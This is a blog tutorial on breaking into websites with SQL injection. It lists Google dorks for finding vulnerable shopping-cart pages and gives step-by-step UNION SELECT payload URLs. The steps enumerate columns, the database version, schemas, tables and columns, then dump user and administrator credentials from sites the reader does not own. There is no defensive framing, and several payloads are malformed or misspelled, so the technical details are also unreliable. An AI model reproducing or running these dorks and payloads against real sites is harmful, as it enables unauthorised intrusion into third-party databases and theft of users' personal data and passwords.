How To Hack A Website Using SQL Injection - A Step By Step Tutorial
How To Hack A Website Using SQL Injection - A Step By Step Tutorial
SQL Injection Is A Code Injection Technique That Exploits A Security Vulnerability Occurring In The Database Layer Of An Application. The Vulnerability Is Present When User Input Is Either Incorrectly Filtered For String Literal Escape Characters Embedded In SqQL Statements Or User Input Is Not Strongly Typed And Thereby Unexpectedly Executed. It Is An Instance Od A More General Class Of Culnerabilities Another SQL Injection Attacks Are Also Known As SQL Insertion Attacks.
Step-By-Step Tutorial For SQL Injection
Step 1 Find A Website That Is Vulnerable To The Attack. This Is The First Step In SQLi And Like Every Other Hack Attack Is The Most Time Consuming Step. Once You Get Through This, Rest Is A Cake-walk Now, Let Us All Know What Kind Of Pages Are Vulnerable To This Attack. We Are Providing You With A Few Dorks (Google Strings To Find Vulnerable Sites). Though At The End Of This Post, We'll Provide A List Of Vulnerable Sites.
Dorks:
accinfo.php?cartId=
acclogin.php?cartID=add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
And You Can Also Write Your Own.
And Download SQL Websites From Here
How To Check If A Website Is Vulnerable To This Attack?
Once You Execute The Dorks And Get The Preferred Search Results. Say For Example
http://www.website.com/index.php?catid=1
Add A '(APOS) At The End Of The URL. Such That URL Looks Like
http://www.website.com/index.php?catid=1'
If The Page Returns An SQL Error, The Page Is Vulnerable To SQLi. If It Loads Normally, Leave The Page And Move On To The Next Site In The Search Result.
Typical Errors You'll Get After Appending The Apostrophe Are:
Warning:mysql_fetch_array():
Warning:mysql_fetch_assoc():
Warning:mysql_fetch_numrows():
Warning:mysql_fetch_num_rows():
Warning:mysql_fetch_result():
Warning:mysql_fetch_preg_match():
Step 2: Once You Find A Vulnerable Site, You Need To Enumerate The Number Of Columns And Thos Columns That Are Accepting The Quries From You.
Append And 'order by' Statement To The URL.
eg. http://www.website.com.index.php?catid=1 order by 1
Continue Increasing The Number After Order By Till You Get An Error. So The Highest Number For Which You Do Not Get An Errir Is The Number Of Column In The Table. Now To Know The Column NumbersWhich Are Accepting The Queries.
Append An 'Union Select' Statement To The URL. ALso Precede The Number After "id=" With A Hyphen Or Minus.
Say From The Above Step, You Got That The Table Has 6 Columns.
Eg. http://www.website.com/index.php?catid=-1 union select 1,2,3,4,5,6
Result Of This Query Will Be The Column Numbers That Are Accepting The Queris. Say We Get 2,3,4 As The Result. Now We'll Inject Our SQL Statements In Onw Of Thease Columns.
Step 3: Enumerating The SQL Version
We'll Use The Mysql Command @@version() To Get The Version Of The DB. We Have To Inject The Command In One Of The Open Columns. Say We Use Columns Number 2.
eg. http://www.website.com/index.php?catid=-1 union select 1,@@version,3,4,5,6
You'll Get The Version Of The Database Is The Place Where You Had Got The Number 2. If The Startiing Of The Version Number Is 5 Or More, Then You Are Good To Go. If Less Move On To Another Site.
Step 4: Exploit
To Get List Of Databases:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(schema_name)3,4,5,6 from information_schema.schemata--
Result Will Display A List Of Databases On The Site. Here On, We'll Write The Results We Have Gor From Our Test.
Result: information_schema, vrk_mlm
To Know The Current Databse In Use:
http://www.website.com/index.php?catid=-1 union select 1,concat(databse()),3,4,5,6--
Result: vrk_mlm
To Get The Current User:
http://www.website.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost
To Get The Tables:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(table_name)3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users
We'll Concentrate Our Attack On The Users Table.
To Get The Columns:
http://www.website.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_Schema=database()--
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,prodKeyword,prodPrice,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,refered_direct_to_ids,refered_toids,no_of_direct_reterals,credits,position,email_id,password,editied_on,last_login,created_on,chain_number,phone,address
By Looking At The Columns Closely, And The Order Of The Tables, We Can Conclude That Starting From if,incredible_id Are The Columns Belonging To THe Users Table And We Are Intrested In That.
Extract Information:
union select group_concat(id,ox3a,incredible_od,ox3a,f_name,ox3a,m_name,ox3a,l_name,ox3a,refered_by_idox3a,refered_direct_to_ids,ox3a) from vrk_mlm.users--
Now You Will Get The Admin User Name And Password....
![25 Ways You Can Hack Your Friend's Facebook Account [UPDATED]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghQFzAUMAZYsUjJCmFvcN89ieZ9YVK7vjn9T76_l4cBZbXRaiWzAeQEqMZ2XzylhM-OV-vF96dTwfRv8I__1BTYJWzxkTq77G9OI5KuutPIubAwX-QYSiDIrBcEZeF81zhqn2V_Bf1p_i8/s72-c/Untitled.png)
No comments